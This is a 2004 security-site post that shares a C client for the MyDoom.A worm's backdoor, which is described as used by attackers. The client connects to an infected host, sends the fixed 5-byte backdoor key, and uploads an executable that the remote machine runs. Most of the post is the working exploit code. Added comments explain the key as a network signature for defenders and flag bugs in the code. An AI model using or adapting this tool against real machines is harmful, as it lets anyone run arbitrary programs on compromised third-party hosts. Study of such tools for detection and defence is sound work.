As you know, machines infected with MyDoom.A are being exploited by MyDoom.C and Vesser. There is a faster and more dangerous "worm" exploiting these machines: its name is "kiddies" !!
So here is one of the codes used by hax0rz to exploit MyDoom.A machines (many other codes are in the wild).
Regards.
Fabien // K-OTik Staff
http://www.k-otik.com
// MyDoom.A Upload/Exec Backdoor
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma lib <ws2_32.lib>
/*
 * Command-line client for the backdoor left listening on MyDoom.A-infected
 * hosts. It resolves argv[1], opens a TCP connection to the port in argv[2],
 * sends the fixed 5-byte sequence held in doompassword, then streams the raw
 * contents of the file named by argv[3]. The closing message claims the remote
 * side then runs what it received.
 *
 * What a defender can take from this listing:
 *  - The only "credential" is a constant 5-byte value, identical for every
 *    infected host. Anyone holding it can push a program to the machine, so an
 *    infected host should be treated as open to arbitrary code execution by
 *    third parties until it is cleaned, not just as a mail-worm infection.
 *  - The same 5 bytes are the first payload bytes of the TCP stream, directly
 *    followed by the file contents. Presumably a network sensor can match an
 *    inbound connection that starts with this sequence followed by an
 *    executable header; verify against captured traffic before relying on it.
 *
 * Returns 0 after the whole file has been sent, -1 on any failure.
 *
 * NOTE(review): the early returns below do not close the file or the socket,
 * and do not call WSACleanup(); the file handle is never fclose()d on any path.
 */
int main(int argc,char *argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
/* Fixed 5-byte sequence sent ahead of the file; the array also holds a
   trailing NUL that is not transmitted (send() below passes length 5). */
char doompassword[] = "\x85\x13\x3c\x9e\xa2";
char buf[1024];
int read=0;
FILE *fuckfile;
WSADATA wsaData;
/* NOTE(review): this admits argc == 3, yet argv[3] is read below and the
   usage text lists three arguments; the check and the usage disagree. */
if(argc<3)
{
printf("***************************************************\n");
printf("***** MyDoom.A Upload/Exec Backdoor*****\n");
printf("**** Usage: %s <ip> <port> <program to upload> ****\n", argv[0]);
printf("***************************************************\n");
return -1;
}
printf("[+] Opening File\n");
/* Opened in binary mode so the bytes are sent unmodified. */
fuckfile = fopen(argv[3],"rb");
if (fuckfile==NULL) {
printf("[-] Open Failed\n");
return -1;
}
printf("[+] File found ready to send\n");
/* 0x101 requests Winsock version 1.1. */
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.\n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // resolve the address given in argv[1]
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port from argv[2] in network byte order; atoi() does no validation
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
// The memset below is disabled, so sin_zero is left uninitialised.
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting error\n");
return -1;
}
printf("[+] Connected\n[+] Sending executable.\n");
send(sockfd,doompassword,5,0); // the fixed 5-byte sequence goes first; the return value is not checked
/* Stream the file in chunks of up to sizeof(buf) bytes. Because feof() is
   only true after a read has hit end-of-file, the last pass can call send()
   with a length of 0. A short send (numbytes < read) is not retried. */
while (!feof(fuckfile)) {
read = fread(buf,sizeof(char),sizeof(buf),fuckfile);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return -1;
}
printf(".");
}
/* The message asserts remote execution; nothing is read back from the
   socket, so this client never confirms it. */
printf("[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 0;
}